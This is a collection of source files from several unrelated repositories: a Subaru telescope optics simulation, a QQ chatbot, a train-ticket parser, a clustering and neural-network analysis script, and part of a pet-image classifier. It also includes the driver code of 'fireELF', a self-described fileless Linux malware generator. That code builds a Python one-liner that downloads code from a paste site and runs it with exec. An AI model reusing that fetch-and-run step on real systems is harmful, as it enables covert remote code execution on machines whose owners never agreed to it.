This code checks to see if there is already
an observation sequence saved with the output of the run in the
location specified by the iop.
:return: boolean flag if it can find a file or not
"""
import os
if os.path.isfile(iop.obs_seq):
dprint(f"File already exists at {iop.obs_seq}")
return True
else:
return False
def open_obs_sequence(obs_seq_file='params.pkl'):
"""opens existing obs sequence .pkl file and returns it"""
with open(obs_seq_file, 'rb') as handle:
obs_sequence =pickle.load(handle)
return obs_sequence
def open_obs_sequence_hdf5(obs_seq_file='fields.h5'):
"""opens existing obs sequence .h5 file and returns it"""
read_hdf5_file = pt.open_file(obs_seq_file, mode='r')
# Here we slice [:] all the data back into memory, then operate on it
obs_sequence = read_hdf5_file.root.data[:]
# hdf5_clusters = read_hdf5_file.root.clusters[:]
read_hdf5_file.close()
return obs_sequence
def pretty_sequence_shape(cpx_sequence):
"""
displays data format easier
:param cpx_sequence: the 6D complex sequence generated by run_medis.telescope
:return: nicely parsed string of 6D shape--human readable output
"""
if len(np.shape(cpx_sequence)) == 6:
samps = ['timesteps', 'save planes', 'wavelengths', 'astronomical bodies', 'x', 'y']
delim = ', '
print(f"Shape of cpx_sequence = "
f"{delim.join([samp + ':' + str(length) for samp, length in zip(samps, np.shape(cpx_sequence))])}")
else:
print(f'Warning cpx_sequence is not 6D as intended by this function. Shape of sequence ='
f' {cpx_sequence.shape}')
####################################################################################################
# Functions Relating to Reading, Loading, and Saving Images #
####################################################################################################
def saveFITS(image, name='test.fit'):
header = afits.Header()
header["PIXSIZE"] = (0.16, " spacing in meters")
hdu = afits.PrimaryHDU(image, header=header)
hdu.writeto(name)
def readFITS(filename):
"""
reads a fits file and returns data fields only
:param filename: must specify full filepath
"""
hdulist = afits.open(filename)
header = hdulist[0].header
scidata = hdulist[0].data
return scidata
def clipped_zoom(img, zoom_factor, **kwargs):
from scipy.ndimage import zoom
h, w = img.shape[:2]
# For multichannel images we don't want to apply the zoom factor to the RGB
# dimension, so instead we create a tuple of zoom factors, one per array
# dimension, with 1's for any trailing dimensions after the width and height.
zoom_tuple = (zoom_factor,) * 2 + (1,) * (img.ndim - 2)
# Zooming out
if zoom_factor < 1:
# Bounding box of the zoomed-out image within the output array
zh = int(np.round(h * zoom_factor))
zw = int(np.round(w * zoom_factor))
top = (h - zh) // 2
left = (w - zw) // 2
# Zero-padding
out = np.zeros_like(img)
out[top:top+zh, left:left+zw] = zoom(img, zoom_tuple, **kwargs)
# Zooming in
elif zoom_factor > 1:
# Bounding box of the zoomed-in region within the input array
zh = int(np.round(h / zoom_factor))
zw = int(np.round(w / zoom_factor))
top = (h - zh) // 2
left = (w - zw) // 2
from medis.Utils.plot_tools import quicklook_im
out = zoom(img[top:top+zh, left:left+zw], zoom_tuple, **kwargs)
# quicklook_im(out, logZ=True)
# `out` might still be slightly larger than `img` due to rounding, so
# trim off any extra pixels at the edges
trim_top = ((out.shape[0] - h) // 2)
trim_left = ((out.shape[1] - w) // 2)
# print top, zh, left, zw
# print out.shape[0], trim_top, h, trim_left, w
if trim_top < 0 or trim_left < 0:
temp = np.zeros_like(img)
temp[:out.shape[0],:out.shape[1]] = out
out = temp
else:
out = out[trim_top:trim_top+h, trim_left:trim_left+w]
# quicklook_im(out, logZ=False)
# If zoom_factor == 1, just return the input array
else:
out = img
# import matplotlib.pyplot as plt
# plt.hist(out.flatten(), bins =100, alpha =0.5)
# plt.hist(img.flatten(), bins =100, alpha=0.5)
# plt.show()
# print(np.sum(img), np.sum(out))
# out = out*np.sum(img)/np.sum(out)
# out = out*4
return out
```
#### File: simulations/Subaru/Subaru_SCExAO.py
```python
import numpy as np
from inspect import getframeinfo, stack
import proper
from medis.params import iop, sp, ap, tp
from medis.utils import dprint
import medis.optics as opx
import medis.aberrations as aber
import medis.adaptive as ao
import medis.atmosphere as atmos
import medis.coronagraphy as cg
#################################################################################################
#################################################################################################
#################################################################################################
# iop.update_testname('SCExAO-dummy-save')
# Defining Subaru parameters
# ----------------------------
# According to Iye-et.al.2004-Optical_Performance_of_Subaru:AstronSocJapan, the AO188 uses the IR-Cass secondary,
# but then feeds it to the IR Nasmyth f/13.6 focusing arrangement. So instead of simulating the full Subaru system,
# we can use the effective focal length at the Nasmyth focus, and simulate it as a single lens.
tp.d_nsmyth = 7.9716 # m pupil diameter
tp.fn_nsmyth = 13.612 # f# Nasmyth focus
tp.flen_nsmyth = tp.d_nsmyth * tp.fn_nsmyth # m focal length
tp.dist_nsmyth_ao1 = tp.flen_nsmyth + 1.14 # m distance secondary to M1 of AO188 (hand-tuned, could update with
# data from literature)
# Below are the actual dimenstions of the Subaru telescope.
# --------------------------------
# tp.enterence_d = 8.2 # m diameter of primary
# tp.flen_primary = 15 # m focal length of primary
# tp.dist_pri_second = 12.652 # m distance primary -> secondary
# Secondary
tp.d_secondary = 1.265 # m diameter secondary, used for central obscuration
# tp.fn_secondary = 12.6
# Re-writing params terms in Subaru-units
# need this to accurately make atmospheric and aberration maps
tp.entrance_d = tp.d_nsmyth
tp.flen_primary = tp.flen_nsmyth
# ----------------------------
# AO188 DM
tp.act_woofer = 15 # approximately a 188 DM (14*14=169) but then we include +2 pixels because the dm map is oversized
# by 2 pixels around the edge of the array
# ----------------------------
# AO188 OAP1
# Paramaters taken from "Design of the Subaru laser guide star adaptive optics module"
# <NAME> et. al. SPIE doi: 10.1117/12.551032
tp.d_ao1 = 0.20 # m diamater of AO1
tp.fl_ao1 = 1.201 # m focal length OAP1
tp.dist_ao1_dm = 1.345 # m distance OAP1 to DM
# ----------------------------
# AO188 OAP2
tp.dist_dm_ao2 = 2.511-tp.dist_ao1_dm # m distance DM to OAP2
tp.d_ao2 = 0.2 # m diamater of AO2
tp.fl_ao2 = 1.201 # m focal length AO2
tp.dist_oap2_focus = 1.261
# ------------------------------
# SCExAO
# These params aren't actually working, so just doing very basic, 4F optical systems until further notice
tp.d_tweeter = 0.051 # diameter of optics in SCExAO train are 2 inches=0.051 m
tp.act_tweeter = 50 # SCExAO actuators are 50x50=2500 actuators
tp.fl_SxOAPG = 0.255 # m focal length of Genera SCExAO lens (OAP1,3,4,5)
tp.fl_SxOAP2 = 0.519 # m focal length of SCExAO OAP 2
tp.d_SxOAPG = 0.051 # diameter of SCExAO OAP's
# tp.dist_cg_sl1 = tp.fl_SxOAPG + .000001 # m distance between AO188 focus and scexao lens1
tp.dist_SxOAP1_scexao = 0.1345 # m
tp.dist_scexao_sl2 = 0.2511 - tp.dist_SxOAP1_scexao # m
tp.dist_sl2_focus = 0.1261 # m
tp.lens_params = [{'aber_vals': [7.2e-17, 0.8, 3.1],
'diam': tp.entrance_d,
'fl': tp.flen_nsmyth,
'dist': tp.dist_nsmyth_ao1,
'name': 'effective-primary'},
{'aber_vals': [7.2e-17, 0.8, 3.1],
'diam': tp.d_ao1,
'fl': tp.fl_ao1,
'dist': tp.dist_ao1_dm,
'name': 'ao188-OAP1'},
{'aber_vals': [7.2e-17, 0.8, 3.1],
'diam': tp.d_ao2,
'fl': tp.fl_ao2,
'dist': tp.dist_oap2_focus,
'name': 'ao188-OAP2'},
{'aber_vals': [7.2e-17, 0.8, 3.1],
'diam': tp.d_SxOAPG,
'fl': tp.fl_SxOAPG,
'dist': tp.fl_SxOAPG,
'name': 'SxOAPG'},
{'aber_vals': [7.2e-17, 0.8, 3.1],
'diam': tp.d_SxOAPG,
'fl': tp.fl_SxOAP2,
'dist': tp.fl_SxOAP2,
'name': 'SxOAP2'}
]
# ------------------------------
# Coronagraph
tp.cg_type = 'Gaussian'
tp.cg_size = 2 # physical size or lambda/D size
tp.cg_size_units = "l/D" # "m" or "l/D"
# tp.fl_cg_lens = 0.1021 # m
tp.fl_cg_lens = tp.fl_SxOAPG
tp.lyot_size = 0.9 # units are in fraction of surface blocked
#################################################################################################
#################################################################################################
#################################################################################################
def Subaru_SCExAO(empty_lamda, grid_size, PASSVALUE):
"""
propagates instantaneous complex E-field thru Subaru from the primary through SCExAO
this function is called a 'prescription' by proper
uses PyPROPER3 to generate the complex E-field at the source, then propagates it through atmosphere,
then telescope, to the focal plane
the AO simulator happens here
this does not include the observation of the wavefront by the detector
:returns spectral cube at instantaneous time in the focal_plane()
"""
# print("Propagating Broadband Wavefront Through Subaru")
# Initialize the Wavefront in Proper
wfo = opx.Wavefronts(sp.debug)
wfo.initialize_proper()
# Atmosphere
# atmos has only effect on phase delay, not intensity
wfo.loop_collection(atmos.add_atmos, PASSVALUE['iter'], plane_name='atmosphere')
# Defines aperture (baffle-before primary)
# wfo.loop_collection(opx.add_obscurations, d_primary=tp.entrance_d, d_secondary=tp.d_secondary, legs_frac=0.05)
wfo.loop_collection(opx.SubaruPupil, plane_name='SubaruPupil')
wfo.loop_collection(proper.prop_circular_aperture,
**{'radius': tp.entrance_d / 2}) # clear inside, dark outside
wfo.loop_collection(proper.prop_define_entrance, plane_name='entrance_pupil') # normalizes abs intensity
if ap.companion:
# Must do this after all calls to prop_define_entrance
wfo.loop_collection(opx.offset_companion)
wfo.loop_collection(proper.prop_circular_aperture,
**{'radius': tp.entrance_d / 2}) # clear inside, dark outside
# Test Sampling
if sp.verbose:
wfo.loop_collection(opx.check_sampling, PASSVALUE['iter'], "Telescope Aperture",
getframeinfo(stack()[0][0]), units='mm')
# Testing Primary Focus (instead of propagating to focal plane)
# wfo.loop_collection(opx.prop_pass_lens, tp.flen_nsmyth, tp.flen_nsmyth) # test only going to prime focus
########################################
# Subaru Propagation
#######################################
# Effective Primary
# CPA from Effective Primary
wfo.loop_collection(aber.add_aber, step=PASSVALUE['iter'], lens_name='effective-primary') # high order
wfo.loop_collection(aber.add_zern_ab, tp.zernike_orders, aber.randomize_zern_values(tp.zernike_orders)) # low order
wfo.loop_collection(opx.prop_pass_lens, tp.flen_nsmyth, tp.dist_nsmyth_ao1)
########################################
# AO188 Propagation
########################################
# # AO188-OAP1
wfo.loop_collection(aber.add_aber, step=PASSVALUE['iter'], lens_name='ao188-OAP1') # high order
wfo.loop_collection(opx.prop_pass_lens, tp.fl_ao1, tp.dist_ao1_dm)
# AO System
if tp.use_ao:
WFS_map = ao.open_loop_wfs(wfo)
wfo.loop_collection(ao.deformable_mirror, WFS_map, PASSVALUE['iter'], apodize=True,
plane_name='woofer', debug=sp.verbose) # don't use PASSVALUE['WFS_map'] here because open loop
# ------------------------------------------------
wfo.loop_collection(proper.prop_propagate, tp.dist_dm_ao2)
# AO188-OAP2
wfo.loop_collection(aber.add_aber, step=PASSVALUE['iter'], lens_name='ao188-OAP2') # high order CPA
wfo.loop_collection(aber.add_zern_ab, tp.zernike_orders, aber.randomize_zern_values(tp.zernike_orders)/2) # low order CPA
wfo.loop_collection(opx.prop_pass_lens, tp.fl_ao2, tp.dist_oap2_focus)
########################################
# SCExAO
# #######################################
# SXExAO Reimaging 1
wfo.loop_collection(aber.add_aber, step=PASSVALUE['iter'], lens_name='SxOAPG') # high order CPA
wfo.loop_collection(proper.prop_propagate, tp.fl_SxOAPG) # from AO188 focus to S-OAP1
wfo.loop_collection(opx.prop_pass_lens, tp.fl_SxOAPG, tp.fl_SxOAPG) # from SxOAP1 to tweeter-DM
#
# AO System
if tp.use_ao:
# WFS_map = ao.open_loop_wfs(wfo)
wfo.loop_collection(ao.deformable_mirror, WFS_map, PASSVALUE['iter'], apodize=True,
plane_name='tweeter', debug=sp.verbose)
# ------------------------------------------------
wfo.loop_collection(proper.prop_propagate, tp.fl_SxOAPG) # from tweeter-DM to OAP2
# SXExAO Reimaging 2
wfo.loop_collection(aber.add_aber, step=PASSVALUE['iter'], lens_name='SxOAP2') # high order NCPA
wfo.loop_collection(aber.add_zern_ab, tp.zernike_orders, aber.randomize_zern_values(tp.zernike_orders)/2) # low order NCPA
wfo.loop_collection(opx.prop_pass_lens, tp.fl_SxOAP2, tp.fl_SxOAP2, plane_name='post-DM-focus') #tp.dist_sl2_focus
# wfo.loop_collection(opx.check_sampling, PASSVALUE['iter'], "post-DM-focus",
# getframeinfo(stack()[0][0]), units='nm')
# Coronagraph
# settings should be put into tp, and are not implicitly passed here
wfo.loop_collection(cg.coronagraph, occulter_mode=tp.cg_type, plane_name='coronagraph')
########################################
# Focal Plane
# #######################################
# Check Sampling in focal plane
# wfo.focal_plane fft-shifts wfo from Fourier Space (origin==lower left corner) to object space (origin==center)
cpx_planes, sampling = wfo.focal_plane()
if sp.verbose:
wfo.loop_collection(opx.check_sampling, PASSVALUE['iter'], "focal plane",
getframeinfo(stack()[0][0]), units='nm')
# opx.check_sampling(PASSVALUE['iter'], wfo, "focal plane", getframeinfo(stack()[0][0]), units='arcsec')
if sp.verbose:
print(f"Finished datacube at timestep = {PASSVALUE['iter']}")
return cpx_planes, sampling
```
|
{
"source": "jesson20121020/myRobot",
"score": 3
}
|
#### File: jesson20121020/myRobot/AliceAutoReply.py
```python
import aiml
import os
import AutoReplyBase
_instance = None
def instance():
global _instance
if _instance == None:
_instance = AliceAutoReply()
return _instance
# 英文自动回复提供方 Alice
class AliceAutoReply(AutoReplyBase.AutoReplyBase):
def __init__(self):
super(AliceAutoReply, self).__init__()
cur_dir = os.getcwd()
os.chdir('./alice')
self.alice = aiml.Kernel()
self.alice.setBotPredicate("name", "Alice")
self.alice.learn("startup.xml")
a = self.alice.respond('LOAD ALICE')
os.chdir(cur_dir)
def respond(self, uid, msg):
result = self.alice.respond(msg)
print ' ROBOT:', result
return True, result
# print instance().respond('', 'hello')
```
#### File: jesson20121020/myRobot/QQChatbot.py
```python
from qqbot import QQBot
class MyQQBot(QQBot):
def onPollComplete(self, msgType, from_uin, buddy_uin, message):
# if message == '-hello':
# self.send(msgType, from_uin, '你好,我是QQ机器人')
# elif message == '-stop':
# self.stopped = True
# self.send(msgType, from_uin, 'QQ机器人已关闭')
import AutoReplyMgr
reply = AutoReplyMgr.instance().auto_reply(str(from_uin), message)
self.send(msgType, from_uin, reply)
myqqbot = MyQQBot()
myqqbot.Login()
myqqbot.Run()
class MyQQBot2(object):
def __init__(self):
self.x = 0
def test2(self):
pass
def test3(self):
self.x = 0
def test4(self):
import os
os.getcwd()
```
#### File: jesson20121020/myRobot/rpycserver.py
```python
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import os, commands, glob, re
import datetime
from rpyc import Service
from rpyc.utils.server import ThreadedServer
class remote_call_func(Service):
def exposed_test(self, output):
print output
import SpecialServiceMgr
print 'xdc::::', SpecialServiceMgr.instance().msg
return SpecialServiceMgr.instance().msg
def exposed_reload(self, module_name): # 热更新
import sys
if module_name in sys.modules:
module = sys.modules[module_name]
reload(module)
return 'reload_module successfully'
else:
return '%s is not exist' % module_name
# rpycServer = ThreadedServer(remote_call_func, hostname='localhost', port=11111, auto_register=False)
# rpycServer.start()
```
#### File: myRobot/train_system/ticketSearch.py
```python
from prettytable import PrettyTable
class TrainCollection(object):
"""解析列车信息"""
# 显示车次、出发/到达站、 出发/到达时间、历时、一等坐、二等坐、软卧、硬卧、硬座
header = "序号 车次 出发站/到达站 出发时间/到达时间 历时 商务座 一等座 二等座 软卧 硬卧 硬座 无座".split()
def __init__(self,rows,traintypes):
self.rows = rows
self.traintypes = traintypes
def _get_duration(self,row):
"""获取车次运行的时间"""
duration = row.get("lishi").decode('utf-8').replace(":",u"小时") + u"分"
if duration.startswith("00"):
return duration[4:]
elif duration.startswith("0"):
return duration[1:]
return duration
@property
def trains(self):
result = []
flag = 0
for row in self.rows:
if row["station_train_code"][0] in self.traintypes:
flag += 1
train = [# 序号
flag,# 车次
row["station_train_code"],# 出发、到达站点
"/".join([row["from_station_name"],row["to_station_name"]]),# 成功、到达时间
"/".join([row["start_time"],row["arrive_time"]]),# duration 时间
self._get_duration(row),# 商务座
row["swz_num"],# 一等座
row["zy_num"],# 二等座
row["ze_num"],# 软卧
row["rw_num"],# 硬卧
row["yw_num"],# 硬座
row["yz_num"],# 无座
row["wz_num"]]
result.append(train)
return result
def print_pretty(self):
"""打印列车信息"""
pt = PrettyTable()
pt._set_field_names(self.header)
for train in self.trains:
pt.add_row(train)
print(pt)
if __name__ == "__main__":
t = TrainCollection()
```
#### File: jesson20121020/myRobot/Utils.py
```python
def is_chinese(uchar):
"""判断一个unicode是否是汉字"""
if uchar >= u'\u4e00' and uchar<=u'\u9fa5':
return True
else:
return False
# def is_number(uchar):
# """判断一个unicode是否是数字"""
# if uchar >= u'u0030' and uchar<=u'u0039':
# return True
# else:
# return False
def is_number(s):
try:
float(s)
return True
except ValueError:
pass
try:
import unicodedata
unicodedata.numeric(s)
return True
except (TypeError, ValueError):
pass
return False
```
|
{
"source": "jessonfoo/fELF",
"score": 3
}
|
#### File: fELF/lib/generator.py
```python
import glob
import importlib
import sys
from lib.misc import print_info
def load_payload(path):
try:
return importlib.import_module(path)
except Exception as e:
return False
def gather_payloads(payload_dir):
payload_to_name = {}
for filepath in glob.iglob("{}*.py".format(payload_dir)):
payload_import_name = filepath[:-3].replace("/", ".")
payload = load_payload(payload_import_name)
if payload:
try:
name = payload.desc["name"].lower()
payload_to_name[name] = payload
print_info("Loaded Payload: '{}'".format(name), "!")
continue
except Exception as e:
print_info("Error Loading Payload", "-")
print_info("Unable to Load: {}".format(payload_import_name), "-")
return payload_to_name
def generate(executable, is_url, payload_dir, payload_to_use):
payloads = gather_payloads(payload_dir)
if payloads:
if payload_to_use:
if payload_to_use in payloads:
print_info("Using Payload: '{}'".format(payload_to_use), "!")
return payloads[payload_to_use].main(is_url, executable)
else:
print_info("not found", "-")
else:
print("-"*20)
for name, payload in payloads.items():
info = payload.desc
print("Payload Name: '{}'".format(name))
print("\tPayload Description: '{}'".format(info["description"]))
print("\tCompatible Architectures: '{}'".format(info["archs"]))
print("\tRequired Python Version on Target: {}".format(info["python_vers"]))
print("-"*20)
while True:
choice = input("Choose Payload (Q to Quit)>> ").lower()
if choice == "q":
break
else:
if choice in payloads:
print_info("Using Payload: '{}'".format(choice), "!")
return payloads[choice].main(is_url, executable)
else:
print_info("Payload Not Found", "-")
else:
print_info("No Useable Payloads", "-")
```
#### File: jessonfoo/fELF/main.py
```python
import argparse
import sys
from lib.settings import *
from lib.generator import *
from lib.misc import *
class main(object):
def parse_args(self, args):
parser = argparse.ArgumentParser(description='fireELF, Linux Fileless Malware Generator')
parser.add_argument('-s', action="store_true", dest="is_supress_banner", help="Supress Banner", default=False)
parser.add_argument('-p', action="store", dest="payload_name", help="Name of Payload to Use")
parser.add_argument('-w', action="store", dest="payload_filename", help="Name of File to Write Payload to (Highly Recommended if You're not Using the Paste Site Option)")
payload = parser.add_mutually_exclusive_group(required=True)
payload.add_argument('-u', action="store", dest="payload_url", help="Url of Payload to be Executed")
payload.add_argument('-e', action="store", dest="executable_path", help="Location of Executable")
return parser.parse_args(args)
def start(self, args):
options = self.parse_args(args)
if not options.is_supress_banner:
banner()
payload_to_use = ((options.payload_url, True), (open(options.executable_path, "rb").read(), False))[bool(options.executable_path)]
payload = generate(payload_to_use[0], payload_to_use[1], PAYLOAD_DIR, options.payload_name)
if payload:
print_info("Successfully Created Payload.", "+")
reduce_size = input("Miniaturize by Removing New Line Characters? (y/N) ").lower()
if reduce_size == "y":
payload = miniaturize_payload(payload)
upload_payload = input("Upload the Payload to Paste site? (y/N) ").lower()
if upload_payload == "y":
url = paste_site_upload(payload)
if url:
payload = "python -c \"import urllib2;exec(urllib2.urlopen('{}').read())\"".format(url)
if len(payload) < 150:
print_payload = input("Generated and Uploaded Payload is Below 150 Characters in Length, Print? (y/N) ").lower()
if print_payload == "y":
print("\n{}\n".format(payload))
if options.payload_filename:
with open(options.payload_filename, "w") as payload_file:
payload_file.write(payload)
payload_file.close()
print_info("Finished.", "!")
if __name__ == '__main__':
entry = main()
entry.start(sys.argv[1:])
```
|
{
"source": "jessrenteria/boggle-solver",
"score": 3
}
|
#### File: boggle-solver/src/anagrammer.py
```python
from trie import Trie
def makeSeq(seq_file):
seq = []
with open(seq_file, 'r') as f:
seq = list(map(lambda x: x.upper(), f.read().strip().split()))
return seq
def getAllWords(seq, t):
words = [set() for _ in range(len(seq))]
def getAllWordsHelper(used, t, s, idx):
used = list(used)
used[idx] = True
elem = seq[idx]
while t != None and elem != "":
t = t.getNode(elem[0])
s += elem[0]
elem = elem[1:]
if t == None:
return
if t.isWord():
words[len(s) - 1].add(s)
for x in range(len(seq)):
if not used[x]:
getAllWordsHelper(used, t, s, x)
used = [False for _ in range(len(seq))]
for idx in range(len(seq)):
getAllWordsHelper(used, t, "", idx)
return words
```
#### File: boggle-solver/src/boggler.py
```python
from trie import Trie
def makeGrid(grid_file):
grid = []
with open(grid_file, 'r') as f:
for line in f:
line = list(map(lambda x: x.upper(), line.strip().split()))
grid.append(line)
return grid
def getAllWords(grid, t):
words = [set() for _ in range(len(grid) * len(grid[0]))]
def getAllWordsHelper(used, t, s, r, c):
used = [list(used[i]) for i in range(len(used))]
used[r][c] = True
elem = grid[r][c]
while t != None and elem != "":
t = t.getNode(elem[0])
s += elem[0]
elem = elem[1:]
if t == None:
return
if t.isWord():
words[len(s) - 1].add(s)
for y in range(max(0, r - 1), min(len(grid), r + 2)):
for x in range(max(0, c - 1), min(len(grid[0]), c + 2)):
if not used[y][x]:
getAllWordsHelper(used, t, s, y, x)
used = [[False] * len(grid[0]) for _ in range(len(grid))]
for r in range(len(grid)):
for c in range(len(grid[0])):
getAllWordsHelper(used, t, "", r, c)
return words
```
#### File: boggle-solver/src/solver.py
```python
import argparse
import time
from trie import Trie
import anagrammer
import boggler
def makeTrie(dict_file):
tree = Trie()
with open(dict_file, 'r') as f:
for word in f:
tree.addWord(word.strip().upper())
return tree
def writeWords(found_file, words):
with open (found_file, 'w') as f:
for length in range(len(words) - 1, 0, -1):
for word in words[length]:
f.write(word + '\n')
def main():
parser = argparse.ArgumentParser(description="Word Finder")
parser.add_argument('dict', type=str, help="a file containing a list of valid words")
parser.add_argument('found', type=str, help="a file to dump found words")
args = parser.parse_args()
print("Making trie...")
start = time.time()
trie = makeTrie(args.dict)
elapsed = time.time() - start
print("Made trie in {:.4f} seconds.".format(elapsed))
while True:
print("> ", end='')
command = input()
if command == 'q' or command == "quit" or command == "exit":
print("Bye!")
break
command = command.split()
if (len(command) != 2
or (command[0] != "anagrammer" and command[0] != "boggler")):
print("Usage: (anagrammer seq_file|boggler grid_file)")
continue
words = []
print("Finding words...")
start = time.time()
if command[0] == "anagrammer":
seq = anagrammer.makeSeq(command[1])
words = anagrammer.getAllWords(seq, trie)
elif command[0] == "boggler":
grid = boggler.makeGrid(command[1])
words = boggler.getAllWords(grid, trie)
elapsed = time.time() - start
print("Found all words in {:.4f} seconds.".format(elapsed))
writeWords(args.found, words)
if __name__ == "__main__":
main()
```
|
{
"source": "jessrosenfield/unsupervised-learning",
"score": 3
}
|
#### File: jessrosenfield/unsupervised-learning/vowel-analysis.py
```python
import argparse
from pprint import pprint
from StringIO import StringIO
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans as KM
from sklearn.decomposition import FastICA as ICA
from sklearn.decomposition.pca import PCA as PCA
from sklearn.feature_selection import SelectKBest as best
from sklearn.feature_selection import f_classif
from sklearn.mixture import GMM as EM
from sklearn.random_projection import GaussianRandomProjection as RandomProjection
from sknn.mlp import Classifier, Layer
import data_util as util
def plot(axes, values, x_label, y_label, title, name):
print "plot" + title + name
plt.clf()
plt.plot(*values)
plt.axis(axes)
plt.title(title)
plt.ylabel(y_label)
plt.xlabel(x_label)
plt.savefig("plots/v/"+name+".png", dpi=500)
# plt.show()
plt.clf()
def pca(tx, ty, rx, ry):
print "pca"
compressor = PCA(n_components = tx[1].size/2)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wPCAtr")
km(newtx, ty, newrx, ry, add="wPCAtr")
nn(newtx, ty, newrx, ry, add="wPCAtr")
print "pca done"
def ica(tx, ty, rx, ry):
print "ica"
compressor = ICA(whiten=True) # for some people, whiten needs to be off
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wICAtr")
km(newtx, ty, newrx, ry, add="wICAtr")
nn(newtx, ty, newrx, ry, add="wICAtr")
print "ica done"
def randproj(tx, ty, rx, ry):
print "randproj"
compressor = RandomProjection(tx[1].size)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
# compressor = RandomProjection(tx[1].size)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add="wRPtr")
km(newtx, ty, newrx, ry, add="wRPtr")
nn(newtx, ty, newrx, ry, add="wRPtr")
print "randproj done"
def kbest(tx, ty, rx, ry):
print "kbest"
for i in range(9):
k = i + 1
add = "wKBtr" + str(k)
compressor = best(f_classif, k=k)
compressor.fit(tx, y=ty)
newtx = compressor.transform(tx)
newrx = compressor.transform(rx)
em(newtx, ty, newrx, ry, add=add)
km(newtx, ty, newrx, ry, add=add)
nn(newtx, ty, newrx, ry, add=add)
print "kbest done"
def em(tx, ty, rx, ry, add="", times=10):
print "em" + add
errs = []
# this is what we will compare to
checker = EM(n_components=2)
checker.fit(rx)
truth = checker.predict(rx)
# so we do this a bunch of times
for i in range(2,times):
clusters = {x:[] for x in range(i)}
# create a clusterer
clf = EM(n_components=i)
clf.fit(tx) #fit it to our data
test = clf.predict(tx)
result = clf.predict(rx) # and test it on the testing set
# here we make the arguably awful assumption that for a given cluster,
# all values in tha cluster "should" in a perfect world, belong in one
# class or the other, meaning that say, cluster "3" should really be
# all 0s in our truth, or all 1s there
#
# So clusters is a dict of lists, where each list contains all items
# in a single cluster
for index, val in enumerate(result):
clusters[val].append(index)
# then we take each cluster, find the sum of that clusters counterparts
# in our "truth" and round that to find out if that cluster should be
# a 1 or a 0
mapper = {x: round(sum(truth[v] for v in clusters[x])/float(len(clusters[x]))) if clusters[x] else 0 for x in range(i)}
# the processed list holds the results of this, so if cluster 3 was
# found to be of value 1,
# for each value in clusters[3], processed[value] == 1 would hold
processed = [mapper[val] for val in result]
errs.append(sum((processed-truth)**2) / float(len(ry)))
plot([0, times, min(errs)-.1, max(errs)+.1],[range(2, times), errs, "ro"], "Number of Clusters", "Error Rate", "Expectation Maximization Error", "EM"+add)
# dank magic, wrap an array cuz reasons
td = np.reshape(test, (test.size, 1))
rd = np.reshape(result, (result.size, 1))
newtx = np.append(tx, td, 1)
newrx = np.append(rx, rd, 1)
nn(newtx, ty, newrx, ry, add="onEM"+add)
print "em done" + add
def km(tx, ty, rx, ry, add="", times=10):
print "km"
#this does the exact same thing as the above
clusters = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 20, 50, 88] # eight for num speakers, eleven for num vowels
orig = add
for num_c in clusters:
add = orig + "nc" + str(num_c)
errs = []
checker = KM(n_clusters=num_c)
checker.fit(ry)
truth = checker.predict(ry)
# so we do this a bunch of times
for i in range(2,times):
clusters = {x:[] for x in range(i)}
clf = KM(n_clusters=i)
clf.fit(tx) #fit it to our data
test = clf.predict(tx)
result = clf.predict(rx) # and test it on the testing set
for index, val in enumerate(result):
clusters[val].append(index)
mapper = {x: round(sum(truth[v] for v in clusters[x])/float(len(clusters[x]))) if clusters[x] else 0 for x in range(i)}
processed = [mapper[val] for val in result]
errs.append(sum((processed-truth)**2) / float(len(ry)))
plot([0, times, min(errs)-.1, max(errs)+.1],[range(2, times), errs, "ro"], "Number of Clusters", "Error Rate", "KMeans clustering error", "KM"+add)
td = np.reshape(test, (test.size, 1))
rd = np.reshape(result, (result.size, 1))
newtx = np.append(tx, td, 1)
newrx = np.append(rx, rd, 1)
nn(newtx, ty, newrx, ry, add="onKM"+add)
print "km done" + add
def nn(tx, ty, rx, ry, add="", iterations=4001):
"""
trains and plots a neural network on the data we have
"""
print "nn" + add
resultst = []
resultsr = []
iter_arr = np.arange(iterations, step=500)
iter_arr[0] = 1
# queue = mp.Queue()
# processes = []
# processes = [mp.Process(target=_nn, args=[tx, ty, rx, ry, i_num]) for i_num in iter_arr]
# for p in processes:
# p.start()
# for p in processes:
# p.join()
# results = []
# for _ in processes:
# results.append(queue.get());
# for result in sorted(results, key=lambda x: x[0]):
# print result
# i_num, train_score, test_score = result
# resultst.append(train_score)
# resultsr.append(test_score)
for i_num in iter_arr:
result = _nn(tx, ty, rx, ry, i_num)
print result
resultst.append(1. - result[1])
resultsr.append(1. - result[2])
plot([0, iterations, 0, 1], (iter_arr, resultst, "ro", iter_arr, resultsr, "bo"), "Network Epoch", "Percent Error", "Neural Network Error", "NN"+add)
print "nn done" + add
def _nn(tx, ty, rx, ry, n_iter):
print "_nn"
nn = Classifier(
layers=[
Layer("Tanh", units=100),
Layer("Softmax")],
n_iter=n_iter)
nn.fit(tx, ty)
resultst = nn.score(tx, ty)
resultsr = nn.score(rx, ry)
print "_nn done"
return n_iter, resultst, resultsr
if __name__=="__main__":
train_x, train_y, test_x, test_y = util.load_vowel()
# em(train_x, train_y, test_x, test_y)
# km(train_x, train_y, test_x, test_y)
# pca(train_x, train_y, test_x, test_y)
# ica(train_x, train_y, test_x, test_y)
# randproj(train_x, train_y, test_x, test_y)
kbest(train_x, train_y, test_x, test_y)
# nn(train_x, train_y, test_x, test_y)
```
|
{
"source": "JessRudder/pretrained-image-classifier",
"score": 4
}
|
#### File: pretrained-image-classifier/intropyproject-classify-pet-images/get_pet_labels.py
```python
from os import listdir
# TODO 2: Define get_pet_labels function below please be certain to replace None
# in the return statement with results_dic dictionary that you create
# with this function
#
def get_pet_labels(image_dir):
"""
Creates a dictionary of pet labels (results_dic) based upon the filenames
of the image files. These pet image labels are used to check the accuracy
of the labels that are returned by the classifier function, since the
filenames of the images contain the true identity of the pet in the image.
Be sure to format the pet labels so that they are in all lower case letters
and with leading and trailing whitespace characters stripped from them.
